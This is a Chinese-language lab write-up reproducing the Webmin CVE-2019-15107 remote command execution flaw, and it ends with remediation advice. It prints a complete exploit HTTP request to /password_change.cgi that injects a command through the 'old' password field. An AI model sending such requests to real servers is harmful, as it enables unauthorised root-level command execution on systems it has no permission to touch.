webmin簡介
Webmin是目前功能最強大的基於Web的Unix系統管理工具。管理員通過瀏覽器訪問Webmin的各種管理功能並完成相應的管理動作。
Webmin 讓您能夠在遠程使用支持 HTTPS (SSL 上的 HTTP)協議的 Web 瀏覽器通過 Web 界面管理您的主機。
漏洞簡介
webmin是一款強大的Unix系統管理工具,在其版本為1.882到1.920存在CVE-2019-15107漏洞,當版本為1.890時,工具在默認配置下易受漏洞的威脅,而在其它版本當用戶關閉密碼過期策略時,受漏洞威脅的概率較小,漏洞主要是起代碼中引用‘qx/ /’方法,把密碼字符串當作命令執行。
利用條件
需要系統開啟密碼修改功能
存在此漏洞的版本
1.882-1.920
漏洞復現
復現此漏洞我們需要先知道root密碼==>利用docker容器修改root密碼
第一步先創建一個bash: docker exec -it CONTAINER_ID bash
(CONTAINER_ID可以用docker ps -a查看)
更新密碼
登錄
設置為允許使用舊密碼重置新密碼(此版本為默認)
漏洞頁面
使用bp抓包,發送到Repeater
構造EXP
命令執行成功
EXP
POST /password_change.cgi HTTP/1.1
Host: 10.10.10.142:10000
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://10.10.10.142:10000/password_change.cgi/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
cache-control: no-cache
user=rootxx&pam=&expired=2&old=ls&new1=test2&new2=test2
關於修復
升級版本,或在版本1.900到1.920中編輯/etc/webmin/miniserv.conf,刪除passwd_mode =行,然后運行/ etc / webmin / restart,以免系統受到攻擊。